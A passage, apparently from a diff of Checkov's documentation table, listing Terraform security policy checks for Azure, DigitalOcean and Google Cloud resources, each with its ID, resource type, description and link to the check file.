[AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 1539 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 1540 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | +| 1541 | CKV2_AZURE_8 | resource | 
azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1542 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1543 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1544 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | +| 1545 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 1546 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | 
[AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 1547 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | +| 1548 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | +| 1549 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 1550 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 1551 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 1552 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | 
[AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 1553 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | +| 1554 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 1555 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 1556 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 1557 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 1558 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | 
[AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | +| 1559 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1560 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1561 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1562 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1563 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1564 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is 
enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1565 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 1566 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 1567 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | +| 1568 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | +| 1569 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | +| 1570 | CKV2_AZURE_26 | resource | 
azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | +| 1571 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | +| 1572 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | +| 1573 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | +| 1574 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | +| 1575 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | +| 1576 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key 
vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | +| 1577 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | +| 1578 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | +| 1579 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | +| 1580 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | +| 1581 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | +| 1582 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | 
[AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | +| 1583 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1584 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1585 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1586 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1587 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | +| 1588 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is 
configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | +| 1589 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | +| 1590 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | +| 1591 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | +| 1592 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | +| 1593 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 1594 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability 
assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 1595 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | +| 1596 | CKV2_AZURE_48 | resource | azurerm_databricks_workspace | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Terraform | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) | +| 1597 | CKV2_AZURE_49 | resource | azurerm_machine_learning_workspace | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml) | +| 1598 | CKV2_AZURE_50 | resource | azurerm_machine_learning_workspace | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) | +| 1599 | CKV2_AZURE_50 | resource | azurerm_storage_account | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | 
[AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) | +| 1600 | CKV2_AZURE_51 | resource | azurerm_synapse_sql_pool | Ensure Synapse SQL Pool has a security alert policy | Terraform | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml) | +| 1601 | CKV2_AZURE_51 | resource | azurerm_synapse_sql_pool_security_alert_policy | Ensure Synapse SQL Pool has a security alert policy | Terraform | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml) | +| 1602 | CKV2_AZURE_52 | resource | azurerm_synapse_sql_pool | Ensure Synapse SQL Pool has vulnerability assessment attached | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml) | +| 1603 | CKV2_AZURE_52 | resource | azurerm_synapse_sql_pool_security_alert_policy | Ensure Synapse SQL Pool has vulnerability assessment attached | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml) | +| 1604 | CKV2_AZURE_52 | resource | azurerm_synapse_sql_pool_vulnerability_assessment | Ensure Synapse SQL Pool has vulnerability assessment attached | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml) | +| 1605 | CKV2_AZURE_53 | resource | azurerm_synapse_workspace | Ensure Azure Synapse Workspace has extended audit logs | Terraform | 
[SynapseWorkspaceHasExtendedAuditLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml) | +| 1606 | CKV2_AZURE_54 | resource | azurerm_synapse_sql_pool | Ensure log monitoring is enabled for Synapse SQL Pool | Terraform | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml) | +| 1607 | CKV2_AZURE_54 | resource | azurerm_synapse_sql_pool_extended_auditing_policy | Ensure log monitoring is enabled for Synapse SQL Pool | Terraform | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml) | +| 1608 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | +| 1609 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | +| 1610 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | +| 1611 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | +| 1612 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | 
[FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | +| 1613 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | +| 1614 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | +| 1615 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | +| 1616 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | +| 1617 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | +| 1618 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | 
[GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | +| 1619 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | +| 1620 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | +| 1621 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | +| 1622 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | +| 1623 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | +| 1624 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | +| 1625 | CKV_GCP_14 | resource | 
google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | +| 1626 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | +| 1627 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | +| 1628 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | +| 1629 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | +| 1630 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | +| 1631 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | 
